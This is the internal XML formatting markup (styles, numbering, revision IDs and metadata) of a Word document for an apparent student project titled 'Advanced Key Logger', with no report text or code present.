  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40ABB35D" w14:textId="77777777" w:rsidR="00DE56A7" w:rsidRDefault="00DE56A7" w:rsidP="003233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F1E9F" w14:textId="74A3E174" w:rsidR="0032334C" w:rsidRDefault="0032334C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>My Something Awesome Project: Advanced Key Logger</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="08068F7E" w14:textId="77777777" w:rsidR="0032334C" w:rsidRDefault="003233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47AA7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="682611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659FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64FC8B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1598B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="829ADB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4259C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACA85C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546341"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="230274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58010E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="558C34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911F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F30C4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521DB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86782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D01357"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60FE74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0F1E2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6510A5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E57CE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE4610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317413"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83D85A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942581">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1138181994">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1138916241">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1065954724">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1462961343">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1954747488">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="338700786">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="365564383">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1598516821">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2089686897">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1527061227">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="566351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3FE"/>
    <w:rsid w:val="0002619D"/>
    <w:rsid w:val="0003095F"/>
    <w:rsid w:val="00033B41"/>
    <w:rsid w:val="0004234A"/>
    <w:rsid w:val="00051264"/>
    <w:rsid w:val="00055CA3"/>
    <w:rsid w:val="000813DC"/>
    <w:rsid w:val="00085C5E"/>
    <w:rsid w:val="000C76EE"/>
    <w:rsid w:val="000F22A2"/>
    <w:rsid w:val="001460CB"/>
    <w:rsid w:val="00161F84"/>
    <w:rsid w:val="001C2371"/>
    <w:rsid w:val="0021382A"/>
    <w:rsid w:val="0021409D"/>
    <w:rsid w:val="00240443"/>
    <w:rsid w:val="00240FAF"/>
    <w:rsid w:val="002626B9"/>
    <w:rsid w:val="00276BAF"/>
    <w:rsid w:val="002D15C1"/>
    <w:rsid w:val="0032334C"/>
    <w:rsid w:val="00370053"/>
    <w:rsid w:val="003A10FE"/>
    <w:rsid w:val="003E58CB"/>
    <w:rsid w:val="003F125B"/>
    <w:rsid w:val="004348B8"/>
    <w:rsid w:val="004375CB"/>
    <w:rsid w:val="00450071"/>
    <w:rsid w:val="00481435"/>
    <w:rsid w:val="00482804"/>
    <w:rsid w:val="00482E49"/>
    <w:rsid w:val="004D19E6"/>
    <w:rsid w:val="004D432F"/>
    <w:rsid w:val="005455AD"/>
    <w:rsid w:val="0054752B"/>
    <w:rsid w:val="00560FD7"/>
    <w:rsid w:val="00567129"/>
    <w:rsid w:val="00575D95"/>
    <w:rsid w:val="00595BE8"/>
    <w:rsid w:val="005A06E9"/>
    <w:rsid w:val="006032FB"/>
    <w:rsid w:val="00630A42"/>
    <w:rsid w:val="00635494"/>
    <w:rsid w:val="00684B82"/>
    <w:rsid w:val="006874B4"/>
    <w:rsid w:val="006D2937"/>
    <w:rsid w:val="006E1B9A"/>
    <w:rsid w:val="007066AA"/>
    <w:rsid w:val="00715C7C"/>
    <w:rsid w:val="00734730"/>
    <w:rsid w:val="00737AAC"/>
    <w:rsid w:val="007971AF"/>
    <w:rsid w:val="007A72C7"/>
    <w:rsid w:val="007B047D"/>
    <w:rsid w:val="007B25B7"/>
    <w:rsid w:val="007E01FE"/>
    <w:rsid w:val="007E2D07"/>
    <w:rsid w:val="007E38A6"/>
    <w:rsid w:val="007E6D4C"/>
    <w:rsid w:val="00822E3A"/>
    <w:rsid w:val="00837BD2"/>
    <w:rsid w:val="00870BB8"/>
    <w:rsid w:val="0087291B"/>
    <w:rsid w:val="00892982"/>
    <w:rsid w:val="00892C5E"/>
    <w:rsid w:val="008A1C5A"/>
    <w:rsid w:val="008A59D5"/>
    <w:rsid w:val="008C4386"/>
    <w:rsid w:val="008E15B5"/>
    <w:rsid w:val="008F2A10"/>
    <w:rsid w:val="00983207"/>
    <w:rsid w:val="00983598"/>
    <w:rsid w:val="009937FB"/>
    <w:rsid w:val="009A33A9"/>
    <w:rsid w:val="009B3A42"/>
    <w:rsid w:val="009C191A"/>
    <w:rsid w:val="009E0FEC"/>
    <w:rsid w:val="009E3509"/>
    <w:rsid w:val="009F23FF"/>
    <w:rsid w:val="00A11274"/>
    <w:rsid w:val="00A149C9"/>
    <w:rsid w:val="00A74DC1"/>
    <w:rsid w:val="00A86952"/>
    <w:rsid w:val="00AA18E7"/>
    <w:rsid w:val="00AB47FE"/>
    <w:rsid w:val="00AB790F"/>
    <w:rsid w:val="00B2052F"/>
    <w:rsid w:val="00B248CD"/>
    <w:rsid w:val="00B50FD1"/>
    <w:rsid w:val="00B743FE"/>
    <w:rsid w:val="00B93F64"/>
    <w:rsid w:val="00BA6908"/>
    <w:rsid w:val="00BF5101"/>
    <w:rsid w:val="00C12B00"/>
    <w:rsid w:val="00C2673D"/>
    <w:rsid w:val="00C302BF"/>
    <w:rsid w:val="00C61050"/>
    <w:rsid w:val="00C8249B"/>
    <w:rsid w:val="00CA30D2"/>
    <w:rsid w:val="00CA55BF"/>
    <w:rsid w:val="00CB23E2"/>
    <w:rsid w:val="00CC7065"/>
    <w:rsid w:val="00D0680D"/>
    <w:rsid w:val="00D105B6"/>
    <w:rsid w:val="00D12A7A"/>
    <w:rsid w:val="00D30129"/>
    <w:rsid w:val="00D30135"/>
    <w:rsid w:val="00D5513A"/>
    <w:rsid w:val="00D60576"/>
    <w:rsid w:val="00D6414C"/>
    <w:rsid w:val="00D85D91"/>
    <w:rsid w:val="00DA378B"/>
    <w:rsid w:val="00DC44C3"/>
    <w:rsid w:val="00DC75F4"/>
    <w:rsid w:val="00DE56A7"/>
    <w:rsid w:val="00E52858"/>
    <w:rsid w:val="00E6398F"/>
    <w:rsid w:val="00E71818"/>
    <w:rsid w:val="00EA0C6B"/>
    <w:rsid w:val="00EE4615"/>
    <w:rsid w:val="00F265AD"/>
    <w:rsid w:val="00F60161"/>
    <w:rsid w:val="00F87D90"/>
    <w:rsid w:val="00FA4DFA"/>
    <w:rsid w:val="00FB26A8"/>
    <w:rsid w:val="00FC3CD9"/>
    <w:rsid w:val="00FE0056"/>
    <w:rsid w:val="00FE2BB7"/>
    <w:rsid w:val="00FE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B2995"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{541E2C9F-48A5-4245-886E-62374D804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D91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33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4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3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334C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334C"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:kern w:val="2"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032334C"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
      <w14:ligatures w14:val="standardContextual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334C"/>
    <w:pPr>
      <w:ind w:left="48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334C"/>
    <w:pPr>
      <w:ind w:left="72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334C"/>
    <w:pPr>
      <w:ind w:left="96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334C"/>
    <w:pPr>
      <w:ind w:left="120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334C"/>
    <w:pPr>
      <w:ind w:left="144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334C"/>
    <w:pPr>
      <w:ind w:left="168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334C"/>
    <w:pPr>
      <w:ind w:left="192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32334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32334C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032334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32334C"/>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032334C"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003233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93F64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B50FD1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50FD1"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C8249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8249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1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vandana0608/Van-s-Advanced-Keylogger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openlearning.com/u/vandanaraoemaneni-s0swqj/blog/ProjectBrief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6006C3-A839-774A-BB2E-2EC33558F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2652</Words>
  <Characters>15117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Vandana Rao Emaneni</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vandana Rao Emaneni</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-27T03:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-01T06:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>